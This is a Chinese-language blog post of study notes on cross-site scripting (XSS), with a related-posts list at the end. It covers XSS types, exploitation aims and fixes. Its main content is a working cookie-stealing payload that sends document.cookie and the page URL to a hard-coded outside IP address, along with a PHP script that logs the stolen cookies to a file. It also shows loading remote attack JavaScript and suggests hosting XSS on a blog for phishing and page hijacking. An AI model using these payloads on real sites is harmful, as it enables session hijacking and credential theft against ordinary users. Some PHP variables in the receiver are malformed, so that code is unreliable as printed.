漏洞原理:接受输入数据,输出显示数据后解析执行
基础类型:反射 ( 非持续 ) ,存储 ( 持续 ) , DOM-BASE
拓展类型: jquery , mxss , uxss , pdfxss , flashxss ,上传 xss 等
常用标签: https://www.freebuf.com/articles/web/340080.html
攻击利用:盲打, COOKIE 盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等
安全修复:字符过滤,实例化编码, http_only , CSP 防护, WAF 拦截等
测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)
#XSS 跨站 - 攻击利用 - 凭据盗取
条件:无防护 Cookie 凭据获取
利用: XSS 平台或手写接受代码
触发: <script>var
url='http://47.94.236.117/getcookie.php?u='+window.location.href+
'&c='+document.cookie;document.write("<img src="+url+"
/>");</script>
接受:
<?php
url=_GET['u'];
cookie=_GET['c'];
fp = fopen('cookie.txt',"a");
fwrite(fp,url."\|".cookie."\n");
fclose($fp);
?>
#XSS 跨站 - 攻击利用 - 数据提交
条件:熟悉后台业务功能数据包,利用 JS 写一个模拟提交
利用:凭据获取不到或有防护无法利用凭据进入时执行其他
然后再写<script src="http://xx.xxx.xxx/poc.js"></script>
也可以主动钓鱼 比如 在自己博客放xss语句 然后进行页面劫持
XSS 跨站&Cookie 盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
我最厉害。,。2025-04-17 13:14
相关推荐
安全系统学习3 小时前
系统安全之大模型案例分析雨白4 小时前
Jetpack系列(三):Room数据库——从增删改查到数据库平滑升级(:满天星:)4 小时前
第31篇:块设备与字符设备管理深度解析(基于OpenEuler 24.03)野蛮人6号6 小时前
虚拟机网络编译器还原默认设置后VMnet8和VMnet1消失了scuter_yu6 小时前
主流零信任安全产品深度介绍江苏思维驱动智能研究院有限公司6 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商花王江不语7 小时前
android studio 配置硬件加速 haxm面朝大海,春不暖,花不开7 小时前
Java网络编程:TCP/UDP套接字通信详解ChicagoTypewriter7 小时前
计算机网络中的常用表项梳理江太翁9 小时前
mediapipe流水线分析 三